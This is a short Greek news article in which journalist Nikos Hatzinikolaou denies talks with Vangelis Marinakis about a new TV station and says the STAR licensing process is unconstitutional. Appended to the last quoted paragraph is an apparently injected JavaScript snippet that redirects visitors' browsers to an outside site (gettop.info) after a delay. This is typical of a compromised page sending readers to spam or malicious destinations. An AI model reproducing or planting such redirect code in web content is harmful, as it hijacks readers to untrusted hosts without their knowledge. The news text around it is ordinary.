Νίκος Χατζηνικολάου: Εύχομαι να μείνει ανοιχτό το STAR και να συνεχίσω εκεί

0
8

Ο Νίκος Χατζηνικολάου επιβεβαίωσε τις πληροφορίες που έγραψε χθες το aixmi.gr, διαψεύδοντας έτσι δημοσιεύματα που τον έφεραν να βρίσκεται σε προχωρημένες συζητήσεις με τον Βαγγέλη Μαρινάκη για να αναλάβει τη διεύθυνση του ενημερωτικού τομέα και την παρουσίαση του κεντρικού δελτίου, τού υπό σύσταση τηλεοπτικού σταθμού του.

«Δεν έχω μιλήσει με κανέναν, μην πιστεύετε ό,τι διαβάζετε», είπε ο επικεφαλής του Real group. «Η ευχή μου είναι να μείνει ανοιχτό το STAR και να συνεχίσω εκεί».

Αναφερόμενος στην απόφασή του να μην ξεκινήσει τις εκπομπές του στο Star, το οποίο δεν εξασφάλισε άδεια στον πρόσφατο διαγωνισμό, σημείωσε χαρακτηριστικά:

«Εύχομαι να μπορέσω να συνεχίσω στο STAR, αλλά δεν μπορώ να ξεκινήσω εκπομπή πριν βγουν οι δικαστικές αποφάσεις που θα κρίνουν τα πάντα στο τηλεοπτικό τοπίο. Ο νόμος και η διαδικασία χορήγησης αδειών είναι αντισυνταγματική. Το Σύνταγμα προβλέπει ότι οι άδειες δίνονται από το Εθνικό Συμβούλιο Ραδιοτηλεόρασης και όχι από την κυβέρνηση». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here